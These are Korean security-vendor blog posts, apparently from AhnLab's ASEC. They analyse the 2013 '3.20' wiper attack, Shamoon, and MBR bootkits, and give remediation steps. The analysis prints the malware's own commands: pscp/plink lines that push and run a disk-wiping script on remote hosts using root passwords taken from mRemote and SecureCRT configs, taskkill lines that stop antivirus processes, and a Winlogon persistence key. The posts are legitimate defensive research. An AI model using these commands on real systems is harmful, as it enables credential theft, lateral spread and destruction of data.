- 1차 : 25 APT 트레이스 스캔
- 2차 : 주중 MBR 프로텍터 제공
- 3.20 APT 공격 노출 여부 및 잔여 흔적 추적하는 ‘APT 트레이스 스캔’ 고객사 제공
비상대응체제 유지 및 고객 피해 최소화 노력 지속
 
글로벌 보안 기업 안랩(대표 김홍선, www.ahnlab.com)은 오늘지난 3 20 14시경 발생한 특정 방송사/금융사 대상 APT 공격에 대한 ‘고객정보보호 후속조치’를 발표했다이는 안랩이 공격발생 당일인 3 20 17 49분에 긴급 V3 엔진 업데이트 및 18 40분에 전용백신을 배포한 데 이은 후속조치이다.
 
안랩이 발표한 고객정보보호 후속조치는 △3.20 APT 공격 노출 여부 및 잔여 흔적을 추적하는 ‘APT 트레이스 스캔(APT Trace Scan)’ 제공 △만약에 있을지 모르는 변종에 대비해PC부팅영역인 ‘MBR(마스터부트레코드)’ 보호를 위한 ‘MBR 프로텍터(MBR Protector)’ 제공 등이다.
 
안랩은 우선 25일부터 ‘APT 트레이스 스캔(APT Trace Scan)’을 고객사에 개별적으로 제공했다. APT 트레이스 스캔은 자신의 PC가 이번 ‘3.20 APT 공격’에 노출됐는지 여부와 공격 흔적을 확인하는 프로그램이다이는 안랩 고객사 중장애증상을 겪지 않았거나 공격 당일 엔진 업데이트 및 전용백신을 실행했어도 이번 공격과 관련해 내부 시스템의 안전 상태를 더욱 정확하게 알고 싶어하는 고객과추측성 정보로 불안해 하고 있는 고객을 위한 지원 프로그램이다.
 
이 프로그램은 사용자의 PC를 스캔한 후만약 공격 흔적이 발견되면 팝업창을 통해 PC격리 및 백업 등 초기 조치와 별도의 안내사항을 공지한다고객 문의 접수 후에는 전화 및 방문 지원으로 고객피해를 최소화할 계획이다.
 
안랩은 25일 ‘APT 트레이스 스캔(APT Trace Scan)’을 제공하고이후 주중에 MBR 프로텍터 등을 상황에 맞게 제공해 고객 정보보호를 체계적으로 진행해나갈 계획이다.
 
사고 발생 후 안랩은 보안 전문가들을 중심으로 전사 비상 대응 체제를 급박하게 가동하고 있다다만 지금까지 피해가 일반 사용자들까지 퍼져있지 않은 상황에서 추측성 정보를 자제해 사회불안 야기를 피하고명확한 원인규명 및 피해 최소화 솔루션 개발에 집중하고자 대외발표를 자제해 왔다.
 
안랩의 김홍선 대표는 “명확한 조사결과 안랩에 귀책사유가 있다면 피하지 않고 책임을 질 것이며이번 사태가 해결될 때까지 비상대응체제를 유지하고 고객 피해를 최소화하기 위해 전사적인 노력을 기울일 것이다”라고 밝혔다

신고
Posted by DH, L@@

3월 20일 14시경 주요 방송사 및 은행 전산망 장애가 발생하는 사고가 한국에서 발생하였으며, ASEC에서는 악성코드 감염 후 디스크 손상으로 부팅 불가로 인해 장애가 발생한 것으로 확인하였다.


현재 해당 악성코드는 운영체제에 따라 디스크를 손상시키는 기능이 포함되어 있으며, 상세한 디스크 손상 내용은 아래 분석 정보에 기술하였다.


해당 악성코드는 V3 엔진(엔진버전:  2013.03.20.06 이상)으로 업데이트 할 경우 검사 및 치료가 가능하며, 3월 20일 오후 6시경부터 제공 중인 전용백신으로도 검사 및 치료 할 수 있다.


[UPDATE - 2013/03/25]


현재까지 ASEC에서 분석한 이번 주요 방송사 및 은행 전산망 장애를 유발한 악성코드는 다음 이미지와 같이 A 케이스와 B 케이스로 나누어서 발생하였다.



우선 위 이미지 좌측 편의 A 케이스에 사용되었던 파일들에 대한 세부 분석 내용은 다음과 같다.


우선 드로퍼인 File A는  %Temp% 폴더에 다음 파일들을 생성하게 된다.


1) File B : MBR 파괴 기능 수행

2) File C : UPX 압축 된 SSL 연결을 위한 PUTTY 툴

3) File D : UPX 압축된 SFTP 연결을 위한 PUTTY 툴

4) File E : UNIX 계열 시스템 DISK를 파괴하는 스크립트


File E 스크립트가 대상으로 하는 시스템은 AIX Unix, HP Unix, Solaris 및 Linux 이다.


AIX, HP, Solaris 3개 시스템에서는 DD 명령어로 디스크를 10MB 및 81MB 크기 만큼 0으로 덮어 쓰기 하며, Linux 시스템에서는 다음의 디렉토리를 삭제한다.


/kernel/ 

/usr/ 

/etc/ 

/home/


File A에 의해 생성된 File B가 실행이 되면, %Temp% 폴더에 ~v3.log 파일이 존재하는지 확인 하게 된다. 만약 해당 파일이 존재 하지 않다면 감염 된 시스템의 MBR(Master Boot Recoard) 및 하드 디스크를 파괴하게 된다.



그리고 File A 외부에서 원격 접속을 시도하기 위해, 다음 경로의 환경 설정 파일인 confCons.xml가 존재하는지 확인 하게 된다.


- Major Version 5인 경우 ( Windows XP, Windows 2003 Server 등 )

C:\Documents and settings\Administrator\Local Settings\Application Data\Felix_Deimel\mRemote\confCons.xml


- Major Version 6인 경우 ( Windows 7, Windows VISTA 등 )

C:\Users\AppData\Local\Felix_Deimel\mRemote\confCons.xml


만약 confCons.xml가 존재 할 경우에는 다음 문자열에 해당하는 내용을 추출한다.


Username="root"

Protocol="SSH"

Password=

Hostname

Descr

Panel

Port

Password


그리고 하나의 스레드를 생성 한 후 앞서 획득한 문자열들을 조합하여 다음의 명령을 실행하게 된다.


%Temp%\File C -batch -P [port] -l root -pw  %Temp%\~pr1.tmp [host]:/tmp/cups

%Temp%\File D -batch -P [port] -l root -pw  [host] "chmod 755 /tmp/cups;/tmp/cups"


SSH의 SCP의 PUTTY 버전인 pscp를 이용해서 File E 를 Batch(Disable all interactive prompts) 종료 후, root 계정으로 호스트의 /tmp/cups 로 복사한다. 그리고, PUTTY의 command 버전인 plink 를 이용해 Batch(disable all interactive prompts) 종료 후, root 계정으로 호스트의 /tmp/cups 에 실행권한을 주고, /tmp/cpus 를 실행한다. 


이와 함께 외부에서 원격 접속을 시도하기 위한 다른 방법으로 다음 경로의 환경 설정 파일이 존재하는 확인하게 된다.


- Major Version 5인 경우 ( Windows XP, Windows 2003 Server 등 )

C:\Documents and settings\Administrator\Application Data\VanDyke\Config\ Sessions\*.ini


- Major Version 6인 경우 ( Windows 7, Windows VISTA 등 )

C:\Users\AppData\Roaming\VanDyke\Config\Sessions\*.ini


만약 환경 설정 파일이 존재 할 경우에는 다음 문자열에 해당하는 내용을 추출하게 된다.


S:"Protocol Name"=SSH

S:"Username"=root

D:"Session Password Saved"=00000001

S:"Hostname"=

S:"Password"=

D:"[SSH2] Port"=


그리고 하나의 스레드를 생성 한 후 앞서 획득한 문자열들을 조합하여 다음의 명령을 실행하게 된다.


%Temp%\conime.exe -batch -P [port] -l root -pw  %Temp%\~pr1.tmp [host]:/tmp/cups

%Temp%\alg.exe -batch -P [port] -l root -pw  [host] "chmod 755 /tmp/cups;/tmp/cups"


MBR(Master Boot Recoard) 및 하드 디스크를 파괴하는 기능을 수행하는 File B는 아래와 같은 파일 매핑 오브젝트(FileMapping Object)를 이용하여 동기화 한 후 하나의 프로세스 만이 실행되도록 한다.


JO840112-CRAS8468-11150923-PCI8273V



그리고  %SystemDirectory%\TEMP\~v3.log 이름의 파일이 존재하는지 확인 한 후, 만약 존재하지 않는다면 MBR(Master Boot Recoard) 및 하드 디스크를 파괴하는 기능을 수행하게 된다.


이와 함께 Taskkill 명령을 WinExeC API로 호출 하여 국내 보안 소프트웨어 프로세스를 종료 하게 된다.


Taskkill /F /IM pasvc.exe

Taskkill /F /IM clisvc.exe


File B는 감염 된 시스템의 윈도우(Windows) 버전에 따라 서로 다른 하드 디스크 파괴 스레드(Thread) 를 생성하게 된다.


1) Major Version 5인 경우 ( Windows XP, Windows 2003 Server 등 )


* 물리 디스크의 MBR과 VBR 등을 "PRINCPES" 문자열로 덮어 쓰기


최대 10개 까지 물리 디스크( \\PHYSICALDRIVE0 ~ \\PHYSICALDRIVE9 )를 열어 각 물리 디스크의 MBR과 VBR을 "PRINCPES"이라는 문자열로 반복하여 덮어 쓰게 된다. 확장 파티션을 사용하고 있는 시스템의 경우에는 확장 파티션의 각 파티션의 VBR까지 파괴의 대상이 된다.


* 논리 드라이브를 "PRINCPES" 문자열로 덮어 쓰기


B:\부터 Z:\ 까지 모든 논리 드라이브 중에서 드라이브 타입(Drive Type)이 DRIVE_REMOVABLE이나 DRIVE_FIXED인 드라이브의 데이터를 "PRINCIPES"이라는 문자열로 반복하여 덮어 쓰게 된다. 덮어 쓰게 되는 데이터는 약 5.3MB 간격으로 100KB 씩 덮어 쓰게 된다.


2) Major Version 6인 경우 ( Windows 7, Windows VISTA 등 )


* 물리 디스크의 MBR과 VBR 등을 "PRINCPES" 문자열로 덮어 쓰기


최대 10개 까지 물리 디스크( \\PHYSICALDRIVE0 ~ \\PHYSICALDRIVE9 )를 열어 각 물리 디스크의 MBR과 VBR을 "PRINCPES"이라는 문자열로 반복하여 덮어 쓰게 된다. 확장 파티션을 사용하고 있는 시스템의 경우에는 확장 파티션의 각 파티션의 VBR까지 파괴의 대상이 된다.


* 모든 논리 드라이브의 데이터를 "PRINCPES" 문자열로 덮어 쓴 후 삭제


모든 논리 드라이브의 데이터를 "PRINCPES" 문자열을 반복하여 덮어 씀으로써 원본 파일 내용을 제거 한 뒤, 모든 파일을 DeleteFile API로 삭제하고 모든 디렉토리를 RemoveDirectoryA API로 삭제 한다. 그리고 D:\부터 차례대로 드라이브의 파일 시스템을 제거 한 뒤, 마지막으로 C:\에서 제거한다. 그러나, C:\의 %SystemDirectory%, %ProgramData%, %ProgramFiles% 세 경로의 파일은 제거 하지 않는다.





논리 드라이브 파괴를 시작하고 나서 5분 뒤 "Shutdown -r -t 0 "라는 커맨드 라인(Command Line)을 WinExec로 실행 하여 시스템을 재부팅 시키나, 하드 디스크가 파괴 중일 경우에는 시스템은 재부팅 되지 않는다.



추가적으로 확인된 최초 이미지 우측 편의 B 케이스에 사용되었던 파일들에 대한 세부 분석 내용은 다음과 같다.


드로퍼(Dropper) 역할을 수행하는 File K가 실행이 되면 아래와 같이 국내 보안 소프트웨어의 프로세스들을 강제 종료하게 된다.


taskkill /F /IM vrfwsvc.exe

taskkill /F /IM vrptsvc.exe

taskkill /F /IM vrscan.exe

taskkill /F /IM hpcsvc.exe

taskkill /F /IM hsvcmod.exe

taskkill /F /IM vrfwsock.exe

taskkill /F /IM vrmonnt.exe

taskkill /F /IM vrrepair.exe

taskkill /F /IM vrmonsvc.exe


그리고 국내 보안 소프트웨어 관련 다음 파일들을 삭제를 시도하게 되며, 삭제된 파일들과 동일한 경로에 File FFile L을 생성하게 된다.

VrDown.exe 
VrPatch.exe
ptUpdate.exe
update.zip
vms1014.zip

생성된 File L은 디스크 파괴 기능을 수행하는 File F를 다운로드 하기 위한 환경 설정 파일이며, File F는 앞서 언급한 A 케이스의 File B와 동일한 기능을 수행하게 된다. 그러나, 아래와 같은 세가지 다른 차이점을 가지고 있다.


1) File F는 File B가 갖고 있는 ~V3.log 파일의 존재 여부를 통해 하드 디스크 파괴 여부를 결정하는 기능이 포함되어 있지 않다.


2) File B는 "PRINCPES" 문자열을 이용하여 덮어쓰기를 수행하게 되나, File F는 "HASTATI" 문자열을 이용하여 덮어쓰기를 수행하게 된다.


3) File B는 실행 즉시 특정 문자열을 이용해 덮어 쓰기를 수행하게 되는 반면에, File F는 2013년 03월 20일 14시 이후에 특정 문자열을 이용해 덮어 쓰기를 수행하게 된다.


[UPDATE - 2013/03/22]


ASEC에서는 이번 전산망 장애를 유발한 악성코드에 대한 새로운 변형과 함께 함께 앞서 언급한 두가지 감염 케이스들과 다른 형태를 추가적으로 발견하였다.


먼저 추가적으로 발견한 디스크 손상을 유발하는 악성코드 File G는 기존에 발견된 File BFile F 들과 기능상으로는 동일하지만 디스크 손상을 유발하기 위해 덮었는 문자열이 "PR!NCPES"으로만 변경되었다.



그리고 추가적으로 발견된 감염 케이스에 사용된 악성코드는 아래 이미지와 동일한 전체적인 구조를 가지고 동작하게 된다.



최초 File H는 File I와 File J 두 개의 파일을 윈도우 시스템 폴더(C:\Widnwos\system32)에 생성하고 File I 를 실행 시킨다. 실행된 File I는 같이 생성된 File J를 정상 시스템 프로세스인 Lsass.exe 프로세스에 인젝션 하게 된다. 


인젝션이 성공적으로 이루어지게 될 경우 인젝션된 File J 힙(Heap)을 할당 받은 후 인코딩(Encoding) 되어 있는 자신의 코드를 디코딩(Decoding) 하여 힙을 생성하여 스레드(Thread로) 구동 한다. 이 때 구동되는 스레드가 디스크를 앞서 언급한 File G와 동일한 "PR!NCPES" 문자열로 디스크를 덮어쓰게 된다.


우선 File H는 생성한 File I를 시스템이 재부팅 할 때마다 자동 실행하기 위해서 윈도우 레지스트리(Registry)에 다음의 키에 값을 추가하게 된다.


HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Shell = explorer.exe, File I


그리고 생성한 윈도우 시스템 폴더에 생성한 File I와 File J의 시간 정보를 Kernel32.dll이 가지고 있는 시간 정보와 동일 하게 성정한다.


File H악성코드가 구동 될 수 있는 환경을 마련 한 뒤에 CMD.exe를 이용하여 ShellExecuteA 함수를 호출하여 자신을 삭제하게 된다.


그리고 생성된 File I는 SeDebugPrivilege 권한을 이용하여 같이 생성된 File J를 정상 시스템 프로세스인 Lsass.exe에 인젝션을 시도 하게 된다.


인젝션은 우선 정상 시스템인 Lsass.exe 프로세스를 찾은 후 File J의 파일명을 문자열로 메모리 할 당 이후, 해당 문자열을 인자로 하여 LoadLibraryW 함수를 시작 주소로 하여 CreateRemoteThread를 호출하는 기법을 이용하였다.


File J 인젝션에 성공하게 되면 XOR 0x55로 인코딩되어 있는 디스크 손상을 위한 코드를 디코딩 한 후에 할당 받은 메모리에 쓰게 된다.


그리고 GetLocalTime 함수를 이용하여 감염된 시스템의 현재 시간을 구한 후 3월 20일 15시가 되기 전까지 대기하게 된다.


이 후 3월 20일 15시 1분이 되면 디코딩 된 디스크 손상을 위해 Thread로 동작하며 전체적인 기능은 앞서 언급한 File G와 동일하나 아래 두 가지만 다르다.


1) 동기화에 사용되는 파일맴핑 오브젝트(FileMapping Object)를 GOLD0112-CRAS8468-PAGE0923-PCI8273W 사용


2) File G는 디스크 손상을 중단하는 파일명이 "~v3.log" 이었으나, File J은 "kb01.tmp"를 사용


현재까지 이번 전산망 장애 관련 악성코드들 모두 V3 제품 군에서 다음과 같이 진단한다.


Win-Trojan/Agent.24576.JPF (2013.03.20.06)

Win-Trojan/Agent.24576.JPG (2013.03.20.07)

Trojan/Win32.XwDoor (2013.03.20.07)

Dropper/Eraser.427520 (2013.03.20.07)

SH/Eraer (2013.03.20.07)

Dropper/Hijacker.153088 (2013.03.21.01)

Win-Trojan/Loader.49152 (2013.03.21.01)

Win-Trojan/Injector.46080.AX (2013.03.21.01)

Trojan/Win32.HDC (AhnLab, 2013.03.21.01) 


현재 ASEC에서는 추가적인 정보들을 지속적으로 수집중이며, 관련된 악성코드들의 상세한 분석 정보를 작성 중에 있다. 


분석정보가 작성되는데로 해당 정보는 수시로 업데이트 될 예정이다.

저작자 표시 비영리 변경 금지
신고
Posted by 비회원

현재까지 PC의 MBR(Master Boot Record)를 변조하여 악의적인 기능을 수행하는 부트킷(Bootkit)은 러시아와 루마니아를 포함한 동유럽 지역에서 제작되어 유포 되는 사례가 다수를 차지하고 있다.


이러한 부트킷에 대해 ASEC에서는 관련 분석 정보들을 블로그들을 통해 공유한 바가 있다.


2011년 10월 - MBR을 변조하는 Halcbot 부트킷 상세 분석


10월 12일 국내 PC 사용자를 대상으로 유포된 부트킷 기능이 포함된 온라인 게임 관련 개인 정보를 탈취하는 악성코드가 발견되었다.


이 번에 발견된 부트킷 기능의 악성코드는 "해피투게더.exe (230,349,368 바이트)"라는 파일명을 가지고 있으며 200 MB가 넘는 큰 크기를 가지고 있다. 해당 악성코드가 동작하는 전체적인 구조를 정리하면 아래 이미지와 동일하다.



유포된 해피투게더.exe 는 실제로는 인스톨 기능을 가진 인스톨러(Installer) 파일로서 해당 악성코드에 감염이 되면 crvsv.exe 가 실행이 되며, 실제 해당 crvsv.exe가 MBR 감염과 함께 온라인 게임 관련 악성코드를 감염시키는 드로퍼(Dropper) 이다.


해당 crvsv.exe 악성코드느 다음의 악의적인 기능을 수행하게 된다. 

 

국내 호스팅 서비스로 운영도는 웹 사이트로 감염된 시스템의 MAC 주소 및 운영체제 버전 정보 전송

 

그리고 DrvInstallDemo.sys 라는 드라이버 파일을 생성하고 실행하게 된다. 해당 드라이버 파일은 윈도우 시스템의 언파티션(Unpartition) 영역에 파일들을 쓸 수 있도록 Crvsv.exe는 드라이버 파일에게 컨트롤 코드(Control Code)를 전송 한다.

 

DrvInstallDemo.sys는 Crvsv.exe 로부터 컨트롤 코드(Control Code)를 받아 언파티션(Unpartition) 영역에 데이터를 쓰게 된다. 해당 부트킷은 언파티션(Unpartition)영역에 아래와 같은 간단한 파일시스템을 설정하게 된다.



각 섹터는 언파티션(Unpartition) 영역에서의 오프셋(Offset)이며 언파티션(Unpartition) 영역의 첫 번째 섹터가 이 데이터를 가지고 있다. 아래 이미지는 실제 감염된 시스템의 언파티션(Unpartition) 영역 첫번째 섹터 이다.



해당 아두스카(Aduska) 부트킷에 감염된 시스템이 재부팅하여 감염된 MBR이 실행 되면, Bootkit.sys가 로드 된다. 로드 된 Bootkit.sys는 PsSetLoadImageNotiftRoutine을 호출하여 이미지(Image)가 생성될 때마다 호출되는 콜백함수를 등록 하게 된다. 


해당 콜백함수는 Userinit.exe가 로드 될 때, DownDll.DLL을 언파티션(Unpartition) 영역에서 읽은 후 생성하게 된다.  생성된 DownDll.DL는 아래와 같은 온라인 게임 프로세스가 로드 될 때 인젝션(Injection)을 수행 하게 된다.


HIGHLOW2.EXE

POKER7.EXE

LASPOKER.EXE

BADUKI.EXE

DUALPOCKER.EXE


ASEC에서는 아두스카 부트킷 대한 정확한 진단 및 치료를 위해 아래와 같이 별도의 전용 백신을 제작하여 배포 중에 있다.


Aduska Bootkit


* 주의 사항


전용백신 실행 전 작업중인 데이타는 반드시 저장하시고, 전용백신 이외에 다른 응용 프로그램은 반드시 종료하시기 바랍니다. 또한 전용백신의 동작중 다른 응용 프로그램의 실행은 가급적 권장 하지 않습니다.

저작자 표시 비영리 변경 금지
신고
Posted by 비회원

8월 17일 ASEC에서는 8월 15일 공개된 외국 언론 "Saudi Aramco says virus shuts down its computer network"을 통해 사우디 아라비아의 정유 업체인 Saudi Aramco에 특정 악성코드에 의한 피해가 발생하였다는 것을 확인 하였다.


추가적으로 ASEC에서 관련 보안 위협에 대한 정보들을 확인하는 과정에서 시만텍(Symantec)에서 "The Shamoon Attacks"로 명명한 보안 위협과 관련되었음을 파악하였다.


Shamoon 보안 위협과 관련된 악성코드는 Disttrack로 명명되었으며, 크게 3가지 기능을 가진 악성코드들이 모듈 형태로 동작하도록 설계되어 있다.


드로퍼(Dropper) - 다른 기능들을 수행하는 악성코드들을 생성하는 메인 악성코드

와이퍼(Wiper) - 실질적인 MBR(Master Boot Record)를 파괴 기능을 수행하는 악성코드

리포터(Reporter) - 공격자에게 감염된 시스템의 현황을 보고 기능을 수행하는 악성코드


해당 Disttrack는 관리 목적의 공유 폴더인 ADMIN$, C$, D$와 E$ 를 통해 네트워크에 이웃한 시스템으로 자신의 복사본을 전송하여 생성하게 된다.


그리고 감염된 시스템에 존재하는 JPEG 파일을 임이의 데이터로 덮어씀으로 이미지 파일을 정상적으로 사용하지 못하게 한다. 이와 함께 감염된 시스템의 MBR을 파괴하여 시스템의 정상적인 부팅과 사용을 방해하게 된다.


Shamoon 보안 위협과 관련된 악성코드는 Disttrack로 명명된 악성코드는 V3 제품군에서 모두 다음과 같이 진단한다.


Win-Trojan/Disttrack.989184 

Win-Trojan/Disttrack.133120 

Win-Trojan/Disttrack.27280  

Win-Trojan/Disttrack.989184.B

Win-Trojan/Disttrack.194048 

Win-Trojan/Disttrack.31632  

Win-Trojan/Disttrack.532992 

Win-Trojan/Disttrack.227840 

Win-Trojan/Disttrack.155136 


현재 해당  Disttrack 악성코드가 계획적으로 정유 업체들을 대상으로 공격하였는지에 대해서는 명확하지 않은 상황이다. 그러나 일반적인 타겟 공격(Targeted Attack)과 다르게 내부 정보 유출 없이 시스템 파괴 기능만 가지고 있다는 점은 특이 사항으로 볼 수 있다.

저작자 표시 비영리 변경 금지
신고
Posted by 비회원
1. 서론
 최근 국내에 MBR (Master Boot Record) 을 감염시키는 악성코드가 발견되어 해당 글을 작성합니다.


2. 악성코드 분석
 해당 악성코드에 감염되게 되면 아래와 같이 MBR (Master Boot Record) 이 변조되게 됩니다. 이로 인해 변조된 MBR 복구해주지 않으면 시스템이 재부팅 될때마다 악성코드가 계속해서 재감염 됩니다.

[그림 1] 변경되기 전 MBR (Master Boot Record)



[그림 2] 변경 된 후 MBR (Master Boot Record)



추가로 악성코드가 MBR을 변조할 때 원본을 다른 섹터 영역에 암호화 하여 백업을 해둡니다. 따라서 수동으로 복원할 경우 암호화 된 백업본을 복호화 하여 복원을 하면 되나 이는 일반 사용자가 하기에는 무리가 있습니다.



3. 감염 시 나타나는 증상
 해당 악성코드는 온라인 게임계정을 탈취하는 악성코드로 감염 시 아래와 같은 증상이 발생하게 됩니다.

1) AV 실행 불가 및 실행 시 엑세스 거부 메시지가 발생
주로 V3 제품 및 기타 AV 제품이 정상적으로 동작하지 않거나 실행 시 아래와 같이 권한 관련 오류 메세지가 발생합니다.

[그림 4] 국내 AV 실행 시 나타나는 오류창


2) 악성코드 재감염 증상
C:\Windows\lpk.dll 파일이 계속해서 재감염 되는 증상이 발생합니다. 이는 MBR에 감염된 악성코드로 인해 계속해서 악성코드가 생성되기 때문에 나타나는 증상입니다. 따라서 위와 같은 경로의 악성코드가 계속해서 재감염 되는 증상이 발생하면 아래 조치방법으로 조치를 해보시기 바랍니다.



4. 조치 방법
 해당 악성코드는 MBR 영역을 치료하여야 하므로 전용백신으로 조치를 하여야 합니다. 아래 안내해 드리는 주소에서 전용백신을 다운로드 후 검사 및 치료를 진행해 주시기 바랍니다.


[그림 5] MBR 치료 전용백신 실행 화면


추가로 수동으로 복구하는 방법을 안내해 드리나 이는 OS를 멀티부팅 환경으로 설정한 사용자나 시스템 복구 영역이 존재하는 시스템에서는 사용을 권장하지 않습니다.


[MBR 영역 복구 방법]
1) 먼저 Windows XP 설치 시디가 필요합니다. 설치 시디를 넣은 후 재부팅을 합니다.

2) 아래와 같은 화면이 나타나면 'R' 키를 눌러 복구메뉴로 들어갑니다.



3) 복구모드로 들어가면 아래와 같이 키보드를 선택하는 창이 나타납니다. 사용하시는 키보드를 선택하시면 되며 사용하시는 키보드가 무엇인지 모르는 경우 첫번째 키보드 선택 후 엔터키를 누르시기 바랍니다.



4) 키보드 선택 후 복구 콘솔에서 '로그온할 Windows 설치를 선택하십시오.' 라는 메시지나 나오면 '1' 을 누른 후 엔터키를 누릅니다. 그리고 Administrator 암호를 입력하면 명령프롬프트가 나타납니다. 이때 'fixmbr' 이라고 입력 후 엔터를 누르면 아래와 같이 MBR을 복구할 수 있는 메세지가 나옵니다. 메세지 확인 후 'Y'를 누르면 복구가 완료 됩니다.





위에 안내해 드린 방법대로 MBR 영역을 복구하고 나면 http://core.ahnlab.com/18 페이지를 참고하시어 아래 파일들을 삭제를 권장 드립니다.

C:\Windows\lpk.dll
C:\Windows\System32\ws2sock.dll (또는 imm32.dll)
C:\Windows\System32\halc.dll
C:\Windows\System32\Disksystem.exe
C:\Windows\System32\
drivers\FileEngine.sys


끝으로 V3 제품 엔진을 최신버전으로 업데이트 후 전체 시스템을 검사를 권장 드립니다.
신고
Posted by 비회원
TAG mbr


◆ 서론

 2011년 3월 3일부터 국내 웹사이트를 겨냥한 DDoS 공격 및 감염PC의 시스템 손상을 일으키는 악성코드가 발견 되었습니다. 시스템 손상은 하드디스크 내부에 존재하는 모든 문서파일 등 주요파일을 손상시킨 후 부팅에 관여하는 MBR 정보를 파괴하여 PC를 부팅불가 및 데이터복구 불가 상태로 만들게 됩니다.

이에 아래 조치 가이드를 활용하여 즉시 예방조치 하실 것을 권해 드립니다.
(본 문서는 윈도2000 이상의 모든 OS군에 유효 합니다.)

1. 현재 사용 중인(전원이 켜있는) 컴퓨터의 예방조치 방법
 A. 안철수연구소 홈페이지에 접속하여 [전용백신 다운로드] 후 검사

2. 현재 사용 중이지 않은(전원이 꺼진) 컴퓨터의 예방조치 방법
 A. 안전모드(네트워크사용)로 부팅
 B. 안철수연구소 홈페이지에 접속하여 [전용백신 다운로드] 검사



따라서, 최초 시스템을 부팅하실때 안전모드(네트워크 사용)으로 부팅하여, 안철수연구소에서 제공하는
전용백신으로 선 조치
후 PC 를 사용하시기 바랍니다.

MBR 이란?
하드 디스크의 맨 앞에 기록되어 있는 시스템 기동용 영역. 컴퓨터(PC)에 전원을 넣으면 먼저 첫 번째 하드 디스크의 MBR에 기록되어 있는 프로그램이 읽힌다. 이렇게 읽힌 MBR의 프로그램은 분할표(partition table)의 정보를 기점으로 기동하는 분할(partition)의 부트 섹터(boot sector:분할의 맨 앞에 있는 OS 기동 프로그램이 기록된 부분)를 읽어 이 섹터의 프로그램에 의해 운영 체계(OS)가 기동된다. 따라서 MBR의 정보가 파괴되면 PC는 기동할 수 없게 된다.

조치 방법

1.     PC를 안전모드(네트워킹 사용)로 부팅.

안전모드 부팅하는 방법은 PC 부팅한 후 F8 키를 연속적으로(0.5초 간격으로 !!! 누름) 누르시면 아래 그림과 같이Windows 고급 옵션 메뉴 (Vista,Win7은 고급부팅옵션)” 화면으로 넘어가게 됩니다.

 

A.     윈도 2000 의 경우 안전모드(네트워크 드라이버 사용) 선택

 

B.      윈도 XP (Vista,Win 7,2003,2008서버 공통)의 경우 안전모드(네트워킹 사용) 선택

 

2.     최신 전용백신 다운로드 및 실행

A.     안철수연구소 홈페이지(http://www.ahnlab.com) 접속


 
i.        
메인 팝업창에서 전용백신 다운로드 받기클릭

  

B.      보호나라 홈페이지 (http://www.boho.or.kr) 접속

                         i.         메인 팝업창에서 안철수연구소 전용백신 다운로드클릭

 

3.     전용백신 실행 후 검사클릭

 

안철수연구소 홈페이지 전용백신

 

보호나라 홈페이지 안철수연구소 전용백신

 

4.     악성코드 발견시 치료 수행 (미 발견시 5번항목으로 이동)

A.     안철수연구소 홈페이지 전용백신

                         i.         악성코드 발견


                        ii.         전체치료 클릭


                       iii.         재부팅 하시겠습니까?(Y) 선택시 치료와 동시에 재부팅 진행

 

B.      보호나라 홈페이지 안철수연구소 전용백신

                         i.         악성코드 발견


                        ii.         악성코드 치료

               

 

5.     검사 완료되면 종료클릭 후 PC 재부팅

 

     V3 사용자께서는 V3를 최신버전으로 업데이트 후 실시간 감시를 꼭 켜 두십시오.

신고
Posted by 비회원